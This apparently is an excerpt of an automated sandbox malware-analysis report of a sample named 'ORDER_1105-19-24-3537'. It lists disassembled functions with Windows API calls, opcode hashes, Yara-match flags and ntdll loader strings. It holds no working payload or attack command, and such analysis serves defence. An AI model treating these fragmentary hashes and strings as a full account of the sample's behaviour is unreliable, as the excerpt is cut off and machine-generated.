LdrInitializeThunk.NTDLL ref: 01182E8A

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4a041419d6dce3baec6977bb455e7038ea9f85dabc5c6c71c7d32e66c83b21b
Instruction ID: cb651da98e07eedd0241bfcb490bcdbe35d84f9f85b864cf347515f5da31ca76
Opcode Fuzzy Hash: b4a041419d6dce3baec6977bb455e7038ea9f85dabc5c6c71c7d32e66c83b21b
Instruction Fuzzy Hash: AB900221A0140902D60571584504616000A97D1241F95C022A1129555ECB298A92A235

Function 01182EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182EAA

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 73713b93f95b1d5f9e70dfe3d2a43096999e9499caadf2496a8663356c6d257f
Instruction ID: 47f17c1ae86bb56e47403ad48151dfc03b7700efff5da5f23c8d3d21bfc1b801
Opcode Fuzzy Hash: 73713b93f95b1d5f9e70dfe3d2a43096999e9499caadf2496a8663356c6d257f
Instruction Fuzzy Hash: 6290027160140802D64471584504746000597D1301F55C011A5169554EC75D8ED56769

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D

Strings

&EA, xrefs: 0041A642, 0041A64C

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4

Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5

Function 0041A695 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 7d8de46da5ff24f50a39854a1109f2a889bde5056767dc6e5793d2599a21100b
Instruction ID: c686d1b8fd82a4a11197cdedf06904ed2bfbdc46836597b027c9db4489e56fe3
Opcode Fuzzy Hash: 7d8de46da5ff24f50a39854a1109f2a889bde5056767dc6e5793d2599a21100b
Instruction Fuzzy Hash: 2EE08C74A04A006FD224DF58CCC5FD73BA8EF48750F108569B91C9F242C130EA01C7A1

Function 0041A7BD Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a0bc16bb9a03409eb938ab9b1934fb1e619be7de1190b583be6e4de6bc8595e4
Instruction ID: 7c4d1ce38936d3535ba02667bc4c15915a27e729beac10556aceb4e6a0d2f433
Opcode Fuzzy Hash: a0bc16bb9a03409eb938ab9b1934fb1e619be7de1190b583be6e4de6bc8595e4
Instruction Fuzzy Hash: 86E0DFB52042506FCB20DF55DC81EEB3BA8EF44220F048599FC8C1B203C534E814CBB8

Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5

Function 01182C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01182C24

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
Instruction ID: e7f4d61e65c81b80bab9f237f4750aa9cc9bc76564ea464632f9ed30a0aefddf
Opcode Fuzzy Hash: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
Instruction Fuzzy Hash: FFB09B71D019C5C5DF16F7644708717790077D1701F25C061D2134645F473CC1D1E675

Non-executed Functions

Function 011F8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE

Download Yara Rule

Strings

The instruction at %p tried to %s , xrefs: 011F8F66
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 011F8DD3
read from, xrefs: 011F8F5D, 011F8F62
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 011F8D8C
Go determine why that thread has not released the critical section., xrefs: 011F8E75
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 011F8E4B
The critical section is owned by thread %p., xrefs: 011F8E69
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 011F8DC4
*** enter .cxr %p for the context, xrefs: 011F8FBD
*** An Access Violation occurred in %ws:%s, xrefs: 011F8F3F
The resource is owned shared by %d threads, xrefs: 011F8E2E
a NULL pointer, xrefs: 011F8F90
*** then kb to get the faulting stack, xrefs: 011F8FCC
This failed because of error %Ix., xrefs: 011F8EF6
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 011F8DB5
*** Inpage error in %ws:%s, xrefs: 011F8EC8
write to, xrefs: 011F8F56
*** enter .exr %p for the exception record, xrefs: 011F8FA1
The resource is owned exclusively by thread %p, xrefs: 011F8E24
an invalid address, %p, xrefs: 011F8F7F
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 011F8F26
*** A stack buffer overrun occurred in %ws:%s, xrefs: 011F8DA3
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 011F8FEF
The instruction at %p referenced memory at %p., xrefs: 011F8EE2
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011F8E86
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 011F8F2D
*** Resource timeout (%p) in %ws:%s, xrefs: 011F8E02
<unknown>, xrefs: 011F8D2E, 011F8D81, 011F8E00, 011F8E49, 011F8EC7, 011F8F3E
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011F8E3F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 011F8F34

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 1dc89f60afe5064bbde62b4cf9dc098ebc0666a79390e2ad2d34da9334077482
Instruction ID: bb062c808f4708d702a512a95d07a1167ae05d2511297a9c2fff00910f706e66
Opcode Fuzzy Hash: 1dc89f60afe5064bbde62b4cf9dc098ebc0666a79390e2ad2d34da9334077482
Instruction Fuzzy Hash: 7F811579A40211BFDB2D9A19CC49E6B7F36EFA6B54F05004CF3086F156E3768502CA63

Function 011C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

DisableExceptionChainValidation, xrefs: 011C275F
@, xrefs: 011C2B74
CFGOptions, xrefs: 011C2967
RaiseExceptionOnPossibleDeadlock, xrefs: 011C2579
ShutdownFlags, xrefs: 011C24A1
minkernel\ntdll\ldrinit.c, xrefs: 011C3187
ExecuteOptions, xrefs: 011C25A0
@, xrefs: 011C2942
MaxLoaderThreads, xrefs: 011C24EC
DisableHeapLookaside, xrefs: 011C246D
UnloadEventTraceDepth, xrefs: 011C24C0
UseImpersonatedDeviceMap, xrefs: 011C251C
FrontEndHeapDebugOptions, xrefs: 011C2489
GlobalFlag2, xrefs: 011C2FC0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 011C3176
LdrpInitializeExecutionOptions, xrefs: 011C317D
MaxDeadActivationContexts, xrefs: 011C2D82
MinimumStackCommitInBytes, xrefs: 011C2BB0
TracingFlags, xrefs: 011C2549
GlobalFlag, xrefs: 011C2F3F, 011C3059

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 199d7836dc8c03e02fb984a875d4a8e68e95401d0b89da5daed25c27a823fc1a
Instruction ID: 99094ed79f37d37a1c74f0f73dc003cf4a604f7e8c21edb828993924f28a2dc4
Opcode Fuzzy Hash: 199d7836dc8c03e02fb984a875d4a8e68e95401d0b89da5daed25c27a823fc1a
Instruction Fuzzy Hash: CD929F71614742AFE729DF28C880F6BB7E8BBA4B54F04492DFA94D7250D770E844CB92

Function 01178620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 011B5543
Thread identifier, xrefs: 011B553A
Critical section address., xrefs: 011B5502
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B540A, 011B5496, 011B5519
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B54E2
Address of the debug info found in the active list., xrefs: 011B54AE, 011B54FA
Invalid debug info address of this critical section, xrefs: 011B54B6
Critical section address, xrefs: 011B5425, 011B54BC, 011B5534
Critical section debug info address, xrefs: 011B541F, 011B552E
corrupted critical section, xrefs: 011B54C2
8, xrefs: 011B52E3
double initialized or corrupted critical section, xrefs: 011B5508
undeleted critical section in freed memory, xrefs: 011B542B
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B54CE

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: e364782040ba47d618120cd20e672b1f40e168984ca49ffe3e22d634c53d2e61
Instruction ID: 1094ec94fc61aa333bd0eebb7f3223972d6588d09c2fbfb1dc0df6eb36e094fd
Opcode Fuzzy Hash: e364782040ba47d618120cd20e672b1f40e168984ca49ffe3e22d634c53d2e61
Instruction Fuzzy Hash: 3B818AB0A41359EFEB68CF99C889BAEBBF6FB48714F104119F504B7250D3B5A941CB60

Function 011729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011B2624
RtlpResolveAssemblyStorageMapEntry, xrefs: 011B261F
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011B2602
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011B2409
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011B25EB
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011B24C0
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011B22E4
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011B2498
@, xrefs: 011B259B
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011B2412
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011B2506

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: b84b9d961732211797afe29bc486f4b076eff6395c28efe906d7910b46bc2e26
Instruction ID: 4b09d52678da1365dae56274f0477491283c3dcdfde389006128025be5ac71e2
Opcode Fuzzy Hash: b84b9d961732211797afe29bc486f4b076eff6395c28efe906d7910b46bc2e26
Instruction Fuzzy Hash: AE0271F1D002299BDB39DB54CC80BEAB7B8AF54704F0141DAE649A7241EB70AF85CF59

Function 011E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 011E8BD0
DefaultBrowser_NOPUBLISHERID, xrefs: 011E8D00
runtimebroker.exe, xrefs: 011E8B73
SegmentHeap, xrefs: 011E8BE9
svchost.exe, xrefs: 011E8B68
csrss.exe, xrefs: 011E8B80
services.exe, xrefs: 011E8B96
smss.exe, xrefs: 011E8B8B
lsass.exe, xrefs: 011E8BA1
heapType, xrefs: 011E8BCB

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: f480fcc3edbb1342687c5f1fdd1eb58b3f980e834b222a24f3f30425d477d528
Instruction ID: c6444ed944b677fc2bc4e6e00346fd60bb3ab61a71b08f2dabf0c7e25c681d80
Opcode Fuzzy Hash: f480fcc3edbb1342687c5f1fdd1eb58b3f980e834b222a24f3f30425d477d528
Instruction Fuzzy Hash: 5051EF71104B019BC32DDF588848BABBBECFF99654F14492DFA99C3284E771D608CB92

Function 011F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 011F04D3
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 011F06EA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 011F069F
HEAP[%wZ]: , xrefs: 011F0399, 011F04A8, 011F05D0, 011F0675, 011F06CC
Just reallocated block at %p to %Ix bytes, xrefs: 011F05F1
RtlReAllocateHeap, xrefs: 011F02BF, 011F0362
About to reallocate block at %p to %Ix bytes, xrefs: 011F03BA
HEAP: , xrefs: 011F03A6, 011F04B5, 011F05DD, 011F0682, 011F06D9

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 7529bc2a1fc94893d8ee0b9d80f065d62d3081eba68a544f18be6a5e6f0eb4a8
Instruction ID: 1ee0ed4f0c99463773f69962d42e145576979f469d67e7a59c6e908772ba4d17
Opcode Fuzzy Hash: 7529bc2a1fc94893d8ee0b9d80f065d62d3081eba68a544f18be6a5e6f0eb4a8
Instruction Fuzzy Hash: 4BD1FB31604682DFDB2EDF68C405AAABBF2FF8A714F09805DF6459B252E734D981CB14

Function 011C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: -*- final list of providers -*- , xrefs: 011C8B8F
VerifierFlags, xrefs: 011C8C50
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 011C8A3D
VerifierDebug, xrefs: 011C8CA5
HandleTraces, xrefs: 011C8C8F
VerifierDlls, xrefs: 011C8CBD
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 011C8A67

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 30c91f7e8cf98be009e675d879ca8682e6ecb023c7f8a3ab6c8a998e4acebb73
Instruction ID: bf1a8844659b51b5028d5942862fc407f8fecc39a7276ba669431673e69a2b1c
Opcode Fuzzy Hash: 30c91f7e8cf98be009e675d879ca8682e6ecb023c7f8a3ab6c8a998e4acebb73
Instruction Fuzzy Hash: E79137B1645712AFD72DDF68E8C4B6AB7E4ABA4F18F06041CFA446B240C770DD01CB96

Function 0114EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Exit, xrefs: 0114EB6C
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0114EB58
T, xrefs: 0114EB4E
{, xrefs: 011A4643
, xrefs: 0114F299
R, xrefs: 0114EB62

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: a2badc4d905e5bee24e6d261ec015d63d9603a6b88d03c60b1b44a61e9292568
Instruction ID: fc073f29a676e61315858f50ea94ba9b4cc33ba637fa02e2d133ea414e933c4b
Opcode Fuzzy Hash: a2badc4d905e5bee24e6d261ec015d63d9603a6b88d03c60b1b44a61e9292568
Instruction Fuzzy Hash: FFA25774A0562ACFDB68CF18C888BA9BBB1BF45704F5442E9D90DA7750DB749E81CF01

Function 011763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 011B40E9, 011B414B, 011B420F, 011B4269
Process initialization failed with status 0x%08lx, xrefs: 011B413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 011B40D8
Delaying execution failed with status 0x%08lx, xrefs: 011B4258
_LdrpInitialize, xrefs: 011B40DF, 011B4141, 011B4205, 011B425F
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 011B41FE

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: dba52b7e7c4d2f232d10c64b0042aa14d2be0a0e8c491ee31dd058e776b28608
Instruction ID: 0b52620588a08be65255da9c503581000860f6b6bbe73c198c4837f34711cdc4
Opcode Fuzzy Hash: dba52b7e7c4d2f232d10c64b0042aa14d2be0a0e8c491ee31dd058e776b28608
Instruction Fuzzy Hash: 04913770B00B15ABFB2DDF18F888BEA7BB1BF51B18F044168E5066B782D7749801C791

Function 0113645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01199A2A
minkernel\ntdll\ldrinit.c, xrefs: 01199A11, 01199A3A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011999ED
LdrpInitShimEngine, xrefs: 011999F4, 01199A07, 01199A30
apphelp.dll, xrefs: 01136496
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01199A01

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
